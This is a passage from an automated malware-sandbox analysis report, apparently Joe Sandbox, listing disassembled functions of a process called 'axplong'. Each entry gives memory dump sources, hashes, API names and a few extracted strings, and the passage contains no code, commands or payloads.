                                                                    • Opcode Fuzzy Hash: 580813ec231af8d693831234a62ad496673b1066266c8758196e884e8bbe147a
                                                                    • Instruction Fuzzy Hash: 3E2260B3F516144BDB0CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159644
                                                                    Function 00936F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dfb1b7379a8771ac134b15a428f8e45bb7ddcee04db99bf3c1dc7321731adac3
                                                                    • Instruction ID: c76893f7dd342922f288b08d4a4ba9487e0f7e6dd019f308b0136cf3138ef2ce
                                                                    • Opcode Fuzzy Hash: dfb1b7379a8771ac134b15a428f8e45bb7ddcee04db99bf3c1dc7321731adac3
                                                                    • Instruction Fuzzy Hash: 91B15CB2214609DFD729CF68C486B65BBE1FF45364F258658E899CF2A1C335E982CF40
                                                                    Function 008F4AF0 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1031be439d47967e2718aee60b8896fb34fe0fc512a12e1f725f63e19f4451b9
                                                                    • Instruction ID: ca421bda8e7f04ab3daf27567864e5b9c10368f9e1e43f23477df13939351b60
                                                                    • Opcode Fuzzy Hash: 1031be439d47967e2718aee60b8896fb34fe0fc512a12e1f725f63e19f4451b9
                                                                    • Instruction Fuzzy Hash: DF51BF706083918FC319CF29851563BBBE1BFD5200F484A9EE1D687292D774DA48CBE2
                                                                    Function 0093777B Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a750f8067d703067beb059887e9232a9782f555c84d5e381117c66e0003c6d20
                                                                    • Instruction ID: 0bae550d57824bc3e689f9788fe9ea6bf50d4cf9e1407f58984f6f7bf2858954
                                                                    • Opcode Fuzzy Hash: a750f8067d703067beb059887e9232a9782f555c84d5e381117c66e0003c6d20
                                                                    • Instruction Fuzzy Hash: 9D21B673F205394B770CC47E8C5727DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                                                    Function 052F040C Relevance: .1, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92a5d5f2ebe321cf88bf09ae90904e3976b8d44e265081d06ddff5bf93f71b71
                                                                    • Instruction ID: 3f1ad5f3d71258bc1ec42bba88bf6e5dac8e0613492f0c164657d142a6773fe3
                                                                    • Opcode Fuzzy Hash: 92a5d5f2ebe321cf88bf09ae90904e3976b8d44e265081d06ddff5bf93f71b71
                                                                    • Instruction Fuzzy Hash: 92118C9B27D260ADE203D560369C4F6EFAAEDD3230330887BF143CA503E1C9494A5331
                                                                    Function 0093765B Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e72bbe1a294ed262a39ba797f66cf825f66f5ac73f54dd9b630afb56048e0710
                                                                    • Instruction ID: defa0690e563b1bafea1ae9c41687605d8ef009b19830cfedf1d11d48157f024
                                                                    • Opcode Fuzzy Hash: e72bbe1a294ed262a39ba797f66cf825f66f5ac73f54dd9b630afb56048e0710
                                                                    • Instruction Fuzzy Hash: 0F11CA63F30C255B675C81BD8C1327AA1D2DBD824070F433AD826E7384E994DE23D390
                                                                    Function 00938720 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: af94e5ad77977dcc2ac3425a01e83fb5f07e6e13e5965d5055d5afc7f04e094b
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 7F11B6BB20034247D615862DD9F85B7A7DFEBC5321F3D437AF0538B658DA229945DD00
                                                                    Function 0092645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a95661f31a5af564bc1d91c35ab72bf714140fd122ae5aaac63d799c047b8aa6
                                                                    • Instruction ID: bbfe093037f0c41d1f094c7e03adf24489139f1ef6f9a4d486918ec9c8018ea4
                                                                    • Opcode Fuzzy Hash: a95661f31a5af564bc1d91c35ab72bf714140fd122ae5aaac63d799c047b8aa6
                                                                    • Instruction Fuzzy Hash: E7E08C30151A186FCE267B15EC5DA8D3B1AEF82390F004800FC4846632CBA5EC91C980
                                                                    Function 0092A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                    • Instruction ID: a888eabb4a3942a8cd03f378d37419527cc923d99ce02dc457ec351c7a2845d5
                                                                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                    • Instruction Fuzzy Hash: 93E0B672919238EBCB15DB98AA44A8AF3ECEB89B50F554496B501D3256C270DF10CBD1
                                                                    Function 00902E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                                                                    • API String ID: 0-2390467879
                                                                    • Opcode ID: d0c37236050ee7f9ccceddb9833c6ce2d0e0ac285b2e28eb3a628b4bf6597891
                                                                    • Instruction ID: 8201a1eeac7b900e3840869b74746766f909629265d943d85bda951acb04645e
                                                                    • Opcode Fuzzy Hash: d0c37236050ee7f9ccceddb9833c6ce2d0e0ac285b2e28eb3a628b4bf6597891
                                                                    • Instruction Fuzzy Hash: 6F02C070E04249EFEF14DFA8C845BDEBBB9AF45314F508158E805A72C2D7759A84CFA2
                                                                    Function 00924770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 009247A7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 009247AF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00924838
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00924863
                                                                    • _ValidateLocalCookies.LIBCMT ref: 009248B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 8dca29e5df98f37217c019ad4fc4012b5e3624a73e979e998b236dac678a7323
                                                                    • Instruction ID: f012c30f257066a7528520624eb5319f60dad5a0257c32baa62a2532231da36a
                                                                    • Opcode Fuzzy Hash: 8dca29e5df98f37217c019ad4fc4012b5e3624a73e979e998b236dac678a7323
                                                                    • Instruction Fuzzy Hash: 4E51E734A21268ABCF10DF68EC85AAE7FB9BF46314F148055E8149B35AD731DE05CF90
                                                                    Function 009270C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wcsrchr
                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                    • API String ID: 1752292252-4019086052
                                                                    • Opcode ID: b60adde084c9567386ace3570a6b8e4242d9648f733880382d355aa87bc56664
                                                                    • Instruction ID: 47a743f0bdb734152054afe01118f0441526826644303613eb34642170f4ec06
                                                                    • Opcode Fuzzy Hash: b60adde084c9567386ace3570a6b8e4242d9648f733880382d355aa87bc56664
                                                                    • Instruction Fuzzy Hash: 4B01DB3760C6362656186599BC02B3B979CAFC7BB8729002BF944F73C7EE44DC524190
                                                                    Function 008F2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Mtx_unlock$Cnd_broadcast
                                                                    • String ID:
                                                                    • API String ID: 32384418-0
                                                                    • Opcode ID: 21a350a3f35c9f98bcbda7a935874fd8c4d00baec0c3a17fafb18e8ff1a8146f
                                                                    • Instruction ID: 7e93902344701eadad237b9995b39bae533fdf900b1d8f7b2ed0a85764698957
                                                                    • Opcode Fuzzy Hash: 21a350a3f35c9f98bcbda7a935874fd8c4d00baec0c3a17fafb18e8ff1a8146f
                                                                    • Instruction Fuzzy Hash: 82A1E0B0A0170A9FDB21DF74C844BAAB7F8FF55314F14822AE915D7281EB31EA04CB91
                                                                    Function 0092C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
